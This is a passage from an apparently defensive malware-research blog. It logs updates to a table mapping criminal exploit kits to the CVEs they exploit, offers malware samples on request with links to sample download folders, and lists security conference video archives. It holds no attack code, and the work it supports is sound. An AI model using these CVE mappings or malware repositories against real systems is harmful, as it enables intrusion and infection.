<br />
====================================================================<br />
<div style="background-color: white;">
</div>
<div style="background-color: white;">
</div>
<div style="background-color: white;">
</div>
<div style="background-color: white;">
<br />
<b>10. May 8, 2011 Version 10 Exploit Pack Table_V10May11</b><br />
First, I want to thank everyone who sent and posted comments for updates and corrections. </div>
<br />
<b>*** The Wild Wild West picture is from a great post about evolution of exploit packs by Kahu Security <a href="http://www.kahusecurity.com/2011/wild-wild-west-update">Wild Wild West Update</a></b><br />
<br />
<a href="http://www.mediafire.com/?jj6830olq6lvxs2"><b><span style="font-size: large;"><br />
</span></b></a> As usual, send your corrections and update lists.<br />
<br /></div>
<div style="background-color: white; color: black;">
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMQKmco1UNxds-K5T8HXnfjZd4ML36WcwDnhD7YQubGh2lVHybHpr7KkfPDA9NLabcSzWKQ0iRoNxr9RioA9I8Zi67pQw7I1L66VypPaNq_qKk0Kjayag3-a2fWAY1T9GNUtdVB76IEFo/s1600/384x1500xwildwildwest_0511.jpg.pagespeed.ic.pw5QWio8Au.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMQKmco1UNxds-K5T8HXnfjZd4ML36WcwDnhD7YQubGh2lVHybHpr7KkfPDA9NLabcSzWKQ0iRoNxr9RioA9I8Zi67pQw7I1L66VypPaNq_qKk0Kjayag3-a2fWAY1T9GNUtdVB76IEFo/s640/384x1500xwildwildwest_0511.jpg.pagespeed.ic.pw5QWio8Au.jpg" width="162" /></a> Changes: </div>
<blockquote>
<blockquote>
<ul>
<li>Eleonore 1.6.4</li>
<li>Eleonore 1.6.3a</li>
<li>Incognito</li>
<li>Blackhole</li>
</ul>
</blockquote>
</blockquote>
<i style="color: #783f04;">Go1Pack</i><i><span style="color: #783f04;"> </span>(not included) as reported as being a fake pack, here is a <a href="http://internetpol.fr/wup/analysis/images/83c7f1fce3515083fff97e05a886fcb9.png">gui</a>. Here is a threatpost article <a href="http://threatpost.com/en_us/blogs/popular-sports-site-goalcom-serves-malware-050311">referencing it as it was used for an attack </a></i><br />
<i>Also, here is another article claiming it is not a fake <a href="http://community.websense.com/blogs/securitylabs/archive/2011/04/19/Mass-Injections-Leading-to-g01pack-Exploit-Kit.aspx">http://community.websense.com/blogs/securitylabs/archive/2011/04/19/Mass-Injections-Leading-to-g01pack-Exploit-Kit.aspx</a></i><br />
<i>Go1 Pack CVE are reportedly</i><br />
<i>CVE-2006-0003<br />
CVE-2009-0927<br />
CVE-2010-1423<br />
CVE-2010-1885</i><br />
<i>Does anyone have this pack or see it offered for sale?</i><br />
<br />
Exploit kits I am planning to analyze and add (and/or find CVE listing for) are:<br />
<br />
<ul>
<li> Open Source Exploit Kit </li>
<li>SALO</li>
<li>K0de</li>
</ul>
<br />
<div style="background-color: white;">
<b>Legend: </b></div>
<div>
Black color entries by Francois Paget</div>
<div>
<span style="color: red;">Red</span> color entries by Gunther</div>
<div>
<span style="color: blue;">Blue</span> color entries by Mila</div>
<br />
Also, here is a great presentation by Ratsoul (Donato Ferrante) about Java Exploits <b>(<a href="http://www.inreverse.net/?p=1687">http://www.inreverse.net/?p=1687</a>)</b><br />
<br />
--------------------------------------------------------<br />
<b>9. April 5, 2011 Version 9 ExploitPackTable_V9Apr11</b><br />
<br />
It actually needs another update but I am posting it now and will issue version 10 as soon as I can.<br />
<br />
Changes:<br />
Phoenix 2.5<br />
IFramer<br />
Tornado<br />
Bleeding life<br />
<br />
Many thanks to Gunther for his contributions.<br />
If you wish to add some, please send your info together with the reference links. Also please feel free to send corrections if you notice any mistakes<br />
<br /></div>
<div style="background-color: white;">
</div>
<div style="background-color: white;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBTdYqQelxIgn1ONyjIa9XMGFuwZ1D98_Pm2NbxsvajlrAG2koWt2YP2S7523WUJGGg8GhXlNxJ0Rtgfa2OOFQfaXMfnszl7Ow4eGLtC3-wcc2pKhYH82I02jcDsCGrYp9rKn8T14mHxU/s1600/pack.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBTdYqQelxIgn1ONyjIa9XMGFuwZ1D98_Pm2NbxsvajlrAG2koWt2YP2S7523WUJGGg8GhXlNxJ0Rtgfa2OOFQfaXMfnszl7Ow4eGLtC3-wcc2pKhYH82I02jcDsCGrYp9rKn8T14mHxU/s400/pack.JPG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE1f6L7e9bUOxf3F4l2bV_vqX7LD0yLLjSs4abjbqML4gri3o0BUVia5WkEAxZly-3xX8NbOoXMW1rLyRjdZfmN7YfpqXnRtsVLLWdRaBcc1hGokANsuwMUPSnUVWrwrwCnKC93Mr6S1I/s1600/incognito.bmp" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE1f6L7e9bUOxf3F4l2bV_vqX7LD0yLLjSs4abjbqML4gri3o0BUVia5WkEAxZly-3xX8NbOoXMW1rLyRjdZfmN7YfpqXnRtsVLLWdRaBcc1hGokANsuwMUPSnUVWrwrwCnKC93Mr6S1I/s200/incognito.bmp" width="200" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjMmfsscCoqks1pWS21Kb2pCkOr-zrtQCxzwAK4AnqjkMcj5K3Ih0W7EuFX_J2ZomD7y2V5xpmoa-c1OI7IIoVgi5LoCWH1zIsSxJT9xPU_Jo5uKQawiOd_B6M1jJ_jZizAcRF_6kAavQ/s1600/bh.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjMmfsscCoqks1pWS21Kb2pCkOr-zrtQCxzwAK4AnqjkMcj5K3Ih0W7EuFX_J2ZomD7y2V5xpmoa-c1OI7IIoVgi5LoCWH1zIsSxJT9xPU_Jo5uKQawiOd_B6M1jJ_jZizAcRF_6kAavQ/s200/bh.PNG" width="200" /></a></div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtQgYZ0bF38ufXhk7cfy1oqG4xp3ky5AgjMVzYcdhOs8mu71erJ7CTnWnh_KXT1Wxdmj8KTwevdG3gAE1OFRaDccQ8Iqc481J_WTX5Il2IabaYxCpBlck-X12AeDYiTOF-dfIqudo6dHU/s1600/sshot.JPG" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div>
<div style="background-color: white;">
<i style="color: #999999;"></i></div>
<div style="background-color: white; color: #999999;">
</div>
<br />
<div>
<br /></div>
<div>
<br /></div>
</div>
<div style="background-color: white;">
<b style="background-color: white;">8. Update 8 Oct 22, 2010 Version 8 </b><b><span style="background-color: white;">Exp</span>loitPackTable_V8Oct22-10</b></div>
<div style="background-color: white;">
<b><br />
</b></div>
<div style="background-color: white;">
<b>Changes: </b></div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
<a bitly="BITLY_PROCESSED" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTPZbqcfiEEG_RT3YHE_bTgBn8IOYAxNCdW_Kno8ge5gTHp3NGau1Sn1VulfQKnBlyH6h5qbhIuQRt6ziK3Wzh7MxbJEKdonVueiVRCQkWONt9hGX1rV-V1oeN_EXAsqN3w07YIib6PTE/s1600/seo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTPZbqcfiEEG_RT3YHE_bTgBn8IOYAxNCdW_Kno8ge5gTHp3NGau1Sn1VulfQKnBlyH6h5qbhIuQRt6ziK3Wzh7MxbJEKdonVueiVRCQkWONt9hGX1rV-V1oeN_EXAsqN3w07YIib6PTE/s320/seo.JPG" width="320" /></a><a bitly="BITLY_PROCESSED" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7FTSmVNDH-TUHRWvkf_r16K2Kd4UoOLVoVp3ujPepJCtJV9qB1fSre9_QrHN4oqHQhUIDu52e9OfCDQF2u592uRDmcAdkkrVwu16_pMgL5HICjgUlEEGxFj6KeoeEmvV3k3jYa_OnQtA/s1600/weleonore.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7FTSmVNDH-TUHRWvkf_r16K2Kd4UoOLVoVp3ujPepJCtJV9qB1fSre9_QrHN4oqHQhUIDu52e9OfCDQF2u592uRDmcAdkkrVwu16_pMgL5HICjgUlEEGxFj6KeoeEmvV3k3jYa_OnQtA/s320/weleonore.JPG" width="320" /></a></div>
<ol style="background-color: white;">
<li><b>Eleonore 1.4.4</b> Moded added (thanks to <a href="http://malwareint.blogspot.com/">malwareint.blogspot.com</a>)</li>
<li><b><span style="color: black;">Correction</span> </b>on CVE-2010-0746 in Phoenix 2.2 and 2.3. It is a mistake and the correct CVE is <span class="status-body"><span class="status-content"><span class="entry-content">CVE-2010-0886</span></span></span> (thanks to <div class="t5" id=":1jw" style="display: none;">
<span id=":1k3" style="display: none;">♫ </span></div>
etonshell for noticing)<span class="status-body"><span class="status-content"><span class="entry-content"><a class="tweet-url username" href="http://twitter.com/pumociiip" rel="http://s.bit.ly/preview.twittername.iframe.html?twittername=pumociiip"><br />
</a></span></span></span></li>
<li><b>SEO Sploit pack</b> added (thanks to <a href="http://whsbehind.blogspot.com/">whsbehind.blogspot.com,</a> <a href="http://evilcodecave.blogspot.com/">evilcodecave.blogspot.com</a> and <a href="http://blog.ahnlab.com/">blog.ahnlab.com</a>)</li>
</ol>
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
<b>7. Update 7 Oct 18, 2010 Version 7 </b><b>ExploitPackTable_V7Oct18-10 released</b></div>
</div>
<div style="background-color: white;">
thanks to <a bitly="BITLY_PROCESSED" href="http://secniche.blogspot.com/2010/10/phoenix-exploit-kit-24-analysis.html">SecNiche</a> <span style="color: black;"><span style="background-color: white;">we have updates for Phoenix 2.4 :)</span></span></div>
<div style="background-color: white;">
<span style="color: black;"><span style="background-color: white;"> </span></span></div>
<div style="background-color: white;">
<span style="color: black;"><span style="background-color: white;">We also added shorthand/slang/abbreviated names for exploits for easy matching of exploits to CVE in the future. Please send us more information re packs, exploit names that can be added in the list. Thank you!</span></span></div>
<div style="background-color: white;">
<span style="color: black;"><span style="background-color: white;"><br />
</span></span></div>
<div style="background-color: white;">
<div class="separator" style="clear: both; text-align: center;">
<a bitly="BITLY_PROCESSED" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhmXnm9hvwe2NXoSnL_Og7vrOWLUW2hboWGyZLHc8-YRnsmFLZhgIq_w_92BKfA6M8QojOaDZ2DAl5QxyiW6vJ3H2Y4iYn5A5P6aORuyG_hS9T_aaXaZ_p_gMeqweO8yuyqTTnqcxYr0U/s1600/kit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhmXnm9hvwe2NXoSnL_Og7vrOWLUW2hboWGyZLHc8-YRnsmFLZhgIq_w_92BKfA6M8QojOaDZ2DAl5QxyiW6vJ3H2Y4iYn5A5P6aORuyG_hS9T_aaXaZ_p_gMeqweO8yuyqTTnqcxYr0U/s320/kit.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<b>6. Update 6 Sept 27, 2010 Version 6 </b><b>ExploitPackTable_V6Sept26-10 released</b></div>
</div>
</div>
<div style="background-color: white;">
<span style="color: black;"><b> </b><span style="background-color: white;">Thanks to Francois Paget (McAfee) we have updates for Phoenix 2.2 and Phoenix 2.3</span><b><br />
</b></span></div>
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
<span style="color: black;"><b>5. Update 5. Sept 27, 2010 Version 5 ExploitPackTable_V5Sept26-10 released</b></span></div>
</div>
<div style="background-color: white;">
<span style="color: black;">Added updates for Phoenix 2.1 and Crimepack 3.1.3</span></div>
<div style="background-color: white;">
<br /></div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
</div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
</div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
<a bitly="BITLY_PROCESSED" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA39x_aSP9e6RjKvgj7gDgNYa2hyphenhyphenmOebGhG368E7kuBCnYnOQQj9CaxAhBiQdD-FRORtxKLJ7FDkLiV7Yxm50arhIDQ30_zbvhFS7GkY0jvxiCa-cXLjNQcvfVDVF6GcrO_TKP5-CNtUY/s1600/phoenix.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA39x_aSP9e6RjKvgj7gDgNYa2hyphenhyphenmOebGhG368E7kuBCnYnOQQj9CaxAhBiQdD-FRORtxKLJ7FDkLiV7Yxm50arhIDQ30_zbvhFS7GkY0jvxiCa-cXLjNQcvfVDVF6GcrO_TKP5-CNtUY/s1600/phoenix.JPG" /></a><a bitly="BITLY_PROCESSED" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi69lhC0djfKAallWkRqUirn0fFjYK94PVmUMuixLVSduBTLJqCSZbCSojRxRNCj8PIr-VYgp8A4IffYfNpA0ZIfKHn9lxrbkxiJyATNbmRxto849V4SYXYAi6ev99UIDBhCTjIASwoo6g/s1600/logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi69lhC0djfKAallWkRqUirn0fFjYK94PVmUMuixLVSduBTLJqCSZbCSojRxRNCj8PIr-VYgp8A4IffYfNpA0ZIfKHn9lxrbkxiJyATNbmRxto849V4SYXYAi6ev99UIDBhCTjIASwoo6g/s1600/logo.png" /></a></div>
<div style="background-color: white;">
<span style="color: black;"><b> </b></span></div>
<div style="background-color: white;">
<span style="color: black;"><b> </b></span></div>
<div style="background-color: white;">
</div>
<div style="background-color: white;">
<span style="color: black;"><span style="background-color: white;"><b>4 Update 4 July 23, 2010 Version 4 ExploitPackTable_V4Ju23-10 released.</b> Added a new Russian exploit kit called Zombie Infection Kit to the table. Read more at </span><a bitly="BITLY_PROCESSED" href="http://malwareview.com/index.php?topic=775"><span style="background-color: white;">malwareview.com</span><span style="background-color: white;"> </span></a></span></div>
</div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
</div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
</div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
<a bitly="BITLY_PROCESSED" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHACENAChyphenhyphenZOUFPZPlCOj53YSHdi1BUU-qhfB0atMwplLiT8_D8crsMsAJZSEjzsKBsrlW5Kv1oPcmzrpr-VVGv_C0PNS8_nvgPxTkop9OB1E8OthM2rwhcYEOJjVaqox7iGm_QBR4u8I/s1600/zombie.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHACENAChyphenhyphenZOUFPZPlCOj53YSHdi1BUU-qhfB0atMwplLiT8_D8crsMsAJZSEjzsKBsrlW5Kv1oPcmzrpr-VVGv_C0PNS8_nvgPxTkop9OB1E8OthM2rwhcYEOJjVaqox7iGm_QBR4u8I/s400/zombie.JPG" width="400" /></a></div>
<div style="background-color: white;">
<span style="background-color: white; color: black;"><span style="background-color: white;">U</span>pdate 3 July 7, 2010. Please read more about this on the Brian Krebs' blog</span><span style="background-color: white;"> </span><a bitly="BITLY_PROCESSED" href="http://krebsonsecurity.com/2010/07/pirate-bay-hack-exposes-user-booty/"><span style="background-color: white;">Pirate Bay Hack Exposes User Booty</span></a><span style="background-color: white; color: #999999;"><span style="color: black;"> </span></span></div>
</div>
<div style="background-color: white;">
<span style="background-color: white; color: #999999;"><span style="color: black;">Update 2 June 27, 2010 Sorry but Impassioned Framework is back where it belongs </span>- <span style="color: blue;">blue </span></span><i style="color: #999999;"><br />
</i></div>
<div style="background-color: white;">
<span style="color: black;">Update 1 June 24, 2010</span> <span style="color: black;">Eleonore 1.4.1 columns was updated to include the correct list of the current exploits.</span></div>
</div>
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
Francois Paget www.avertlabs.com kindly agreed to allow us to make additions to his <a bitly="BITLY_PROCESSED" href="http://www.avertlabs.com/research/blog/index.php/2010/05/28/an-overview-of-exploit-packs/">Overview of Exploit Packs table</a> published on Avertlabs (McAfee Blog)</div>
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
Many thanks to Gunther from ARTeam for his help with the update. There are a few blanks and question marks, please do no hesitate to email me if you know the answer or if you see any errors.</div>
<div style="background-color: white;">
<br /></div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
<a bitly="BITLY_PROCESSED" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv9MPqWGW1g-xQlkTij_xU9HHcwBp9P9_P0VESEEGsGMnhSoBc4BuiP1U_MFYTqsQOQdIiHyP09hX9QnaUtFVuhi6hJ1wrdJRJkn3LVZ0XknL1eaMcmqHV13Qit_snY9gYsquwVgUQb6s/s1600/trashbag.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><br />
</a></div>
<div style="background-color: white;">
<a bitly="BITLY_PROCESSED" href="http://www.mediafire.com/?1i8ef7lg79g63q6"></a></div>
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
Please click on the image below to expand it (it is a partial screenshot) <span style="background-color: white; color: #741b47;"> </span><strike><i style="color: #666666;">Impassioned Framework is tentatively marked a different color because the author claims it is a security audit tool not exploit pack. However, there was no sufficient information provided yet to validate such claims. The pack is temporarily/tentatively marked a different color. We'll keep you posted.</i></strike></div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
</div>
<div style="background-color: white;">
<br /></div>
<div style="background-color: white;">
<strike><i style="color: #666666;"> </i></strike></div>
<div class="separator" style="background-color: white; clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="background-color: white; clear: both; text-align: center;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifBQ27o3pqTKDpwbNI1c7ffCrRRMbc8JXx8F7I25Dan9pD32LmyGKKqxasx9p957e1GB47gQFdWyMBOKHr_zXUcmzg4_YB_bWf32WT1mZovpERZ6bDbm7EqSLUdF4r9feSR1x2ciyb7rE/s320/bagyellow.jpg" /></div>
</div>
</div>
</div>
</div>
</div>
</div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com17tag:blogger.com,1999:blog-7885177434994542510.post-71520950376421204422015-03-08T21:08:00.003-04:002015-03-09T10:03:30.368-04:00Ask and you shall receive<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgot8dd0oLvizWpd0NzYrH_XM_bBq-viuo-JjjiljMT1CSJre09-RO_F5sg9XMqekk-r-w5bNgib6im4bh4HXGuFf5yZ-jHLvhnF6Jvt_VQKzdFXkhuABveWuw_5k03yl8v5RmvKUJpyhk/s1600/ask.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgot8dd0oLvizWpd0NzYrH_XM_bBq-viuo-JjjiljMT1CSJre09-RO_F5sg9XMqekk-r-w5bNgib6im4bh4HXGuFf5yZ-jHLvhnF6Jvt_VQKzdFXkhuABveWuw_5k03yl8v5RmvKUJpyhk/s1600/ask.jpg" height="200" width="153" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
I get emails from readers asking for specific malware samples and thought I would make a mini post about it.<br />
<br />
Yes, I often obtain samples from various sources for my own research.<br />
<br />
I am sometimes too lazy/busy to post them but don't mind sharing.<br />
If you are looking for a particular sample, feel free to ask. I might have it.<br />
<br />
Send MD5 (several or few samples). I cannot provide hundreds/thousands of samples or any kind of feeds. If you ask for a particular family, I <u>might</u> be able to help if I already have it.<br />
<br />
Unfortunately, I do not have time to do homework for students and provide very specific sets for malware with specific features as well as guarantee the C2s are still active. Send your MD5(s) or at least malware family and I check if I have it :) If i have it, I will either send you or will post on the blog where you can download.<br />
<br />
If you emailed me in the past and never got an answer, please remind me. Sometimes emails are long with many questions and I flag them to reply to later, when I have time and they get buried or I forget. It does not happen very often but accept my apologies if it happened to you.<br />
<br />
Before you ask, check if it is already available via Contagio or Contagio Mobile.<br />
1. Search the blog using the search box on the right side<br />
2. Search here <a href="https://www.mediafire.com/folder/b8xxm22zrrqm4/BADINFECT">https://www.mediafire.com/folder/b8xxm22zrrqm4/BADINFECT</a><br />
3. Search here <a href="https://www.mediafire.com/folder/c2az029ch6cke/TRAFFIC_PATTERNS_COLLECTION">https://www.mediafire.com/folder/c2az029ch6cke/TRAFFIC_PATTERNS_COLLECTION</a><br />
4. Search here <a href="https://www.mediafire.com/folder/78npy8h7h0g9y/MOBILEMALWARE">https://www.mediafire.com/folder/78npy8h7h0g9y/MOBILEMALWARE</a><br />
<br />
Cheers, Mila<br />
<br /></div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com0tag:blogger.com,1999:blog-7885177434994542510.post-13031770394757244562015-01-04T23:11:00.001-05:002015-01-27T23:11:24.735-05:00Video archives of security conferences and workshops<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: right;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWcT5MFnJP3apSjim141kO3S-0I-80pRRJsKmrEY70f-kzungCUhcuwP_2p-orN7nPYGy38jc-iq9J4rfbBgj3addgltSY3IUbWF7t81BzNaPKPuqzacS3uuyxJR1SR390tfhm_Z9l1tY/s1600/conf.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWcT5MFnJP3apSjim141kO3S-0I-80pRRJsKmrEY70f-kzungCUhcuwP_2p-orN7nPYGy38jc-iq9J4rfbBgj3addgltSY3IUbWF7t81BzNaPKPuqzacS3uuyxJR1SR390tfhm_Z9l1tY/s1600/conf.PNG" height="136" width="200" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Just some links for your enjoyment</span><br />
<span style="font-family: inherit;"><br /></span>
<b><span style="font-family: inherit;"><a href="http://www.concise-courses.com/security/conferences-of-2014/"><span id="goog_558997503"></span>List of security conferences in 2014</a><span id="goog_558997504"></span></span></b><br />
<span style="font-family: inherit;"><b><br /></b>
<b><span style="color: #38761d;">Video archives:</span></b></span><br />
<span style="font-family: inherit;"><b><u><br /></u></b>
<b><u><br /></u></b>
<b><u></u></b></span><br />
<a name='more'></a><b><span style="font-family: inherit;">AIDE (Appalachian Institute of Digital Evidence)</span></b><br />
<span style="font-family: inherit;"><br /></span>
<ul style="text-align: left;">
<li><a href="http://www.irongeek.com/i.php?page=videos/aide2013/mainlist"><span style="font-family: inherit;">2013</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/aide2012/mainlist"><span style="font-family: inherit;">2012</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/aide-2011-summer"><span style="font-family: inherit;">2011</span></a></li>
</ul>
<span style="font-family: inherit;"><br /></span>
<b><span style="font-family: inherit;">Blackhat</span></b><br />
<ul style="text-align: left;">
<li><span style="font-family: inherit;"><a href="http://www.securitytube.net/tags/blackhat-2012">2012</a> or 2012 <a href="https://kickass.so/blackhat-usa-2012-training-videos-t6654392.html">torrent</a></span></li>
</ul>
<b><span style="font-family: inherit;">Botconf</span></b><br />
<ul style="text-align: left;">
<li><a href="http://www.dailymotion.com/user/botconf/1"><span style="font-family: inherit;">2013</span></a></li>
</ul>
<b><span style="font-family: inherit;">Bsides</span></b><br />
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PLWeT8XI0Y0X7MI_Q-nbG4JUKIGmvLhd3l"><span style="font-family: inherit;">BSides DC 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm8gdU_SrJ5ywg__EID7rF__"><span style="font-family: inherit;">BSides Chicago 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm84yChyJp18uWgg66le-07Q"><span style="font-family: inherit;">BSides Nashville 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm_OHEYLH-bNUPJkLDZbHUbR"><span style="font-family: inherit;">BSides Augusta 2014</span></a></li>
<li><a href="https://www.youtube.com/watch?v=SF0_2G13M3E"><span style="font-family: inherit;">BSides Huntsville 2014</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/bsideslasvegas2014/mainlist"><span style="font-family: inherit;">BSides Las Vegas 2014</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm8d9fRdBlk2Pwg4JhACLL1G"><span style="font-family: inherit;">BSidesDE 2013</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm8OAGyypgVeEnYCJW_oY2vt"><span style="font-family: inherit;">BSidesLV 2013</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm-AlE2UhXKT7HZSn_4dht4j"><span style="font-family: inherit;">BSidesRI 2013</span></a></li>
<li><a href="https://archive.org/details/BsidesCleveland2012Bsidescle"><span style="font-family: inherit;">Bsides Cleveland 2012 BsidesCLE</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PL6BDB3C7E02162BAB"><span style="font-family: inherit;">Bsides Las Vegas 2012</span></a></li>
</ul>
<b><span style="font-family: inherit;">Chaos Communication Congress</span></b><br />
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/channel/UCP7Tg7pv6Gf_5vG2r3CRs9g/videos"><span style="font-family: inherit;">Chaos Communications Channel YouTube</span></a></li>
<li><a href="http://media.ccc.de/browse/congress/2014/"><span style="font-family: inherit;">31c3 Recordings</span></a></li>
</ul>
<b><span style="font-family: inherit;">Defcon</span></b><br />
<ul style="text-align: left;">
<li><a href="https://www.defcon.org/html/torrent/DEF%20CON%20Conference%20CD%20DVD%20collection%202014.torrent"><span style="font-family: inherit;">Defcon: All Conference CDs and DVDs with Presentation PDF files (updated 2014 for DEF CON 22): Torrent</span></a></li>
<li><a href="http://www.irongeek.com/i.php?page=videos/defcon-wireless-village-2014/mainlist"><span style="font-family: inherit;">Defcon Wireless Village 2014</span></a></li>
<li><a href="https://www.defcon.org/html/links/dc-torrent.html"><span style="font-family: inherit;">Defcon: all other</span></a></li>
</ul>
<b><span style="font-family: inherit;">Derbycon</span></b><br />
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm8o9c_2_iDDTV6tCPdMp5dg"><span style="font-family: inherit;">Derbycon 4</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm-Wo3Kpvn8oIm_rD5PwlmHX"><span style="font-family: inherit;">DerbyCon 3</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm97hLg2WXjW1qTytN-pbDtv"><span style="font-family: inherit;">Derbycon 2</span></a></li>
<li><a href="https://www.youtube.com/playlist?list=PL2ABA97A5B8AA1005"><span style="font-family: inherit;">Derbycon 1</span></a></li>
</ul>
<b><span style="font-family: inherit;">Digital Bond's S4x14</span></b><br />
<ul style="text-align: left;">
<li><a href="http://vimeopro.com/s42012/s4x14"><span style="font-family: inherit;">Digital Bond's S4x14 ISC Security</span></a></li>
</ul>
<b><span style="font-family: inherit;">Circle City Con</span></b><br />
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm8AQVCGin_go3JgJe4dVgPR"><span style="font-family: inherit;">Circle City Con 2014</span></a></li>
</ul>
<b><span style="font-family: inherit;">GrrCON Information Security Summit & Hacker Conference</span></b><br />
<ul style="text-align: left;">
<li><a href="https://www.youtube.com/playlist?list=PLNhlcxQZJSm-z4Iy9ebGu037gcubEnkEK"><span style="font-family: inherit;">GrrCON 2014</span></a></li>
</ul>
<div>
<b><span style="font-family: inherit;">Hack in the box HITB</span></b></div>
<div>
<ul style="text-align: left;">
<li><a href="http://www.securitytube.net/tags/hackinthebox-2011"><span style="font-family: inherit;">2011</span></a></li>
</ul>
<div>
<span style="font-family: inherit;"><span style="background-color: white; color: #222222;"><b>Hack in Paris :</b></span></span><ul style="text-align: left;">
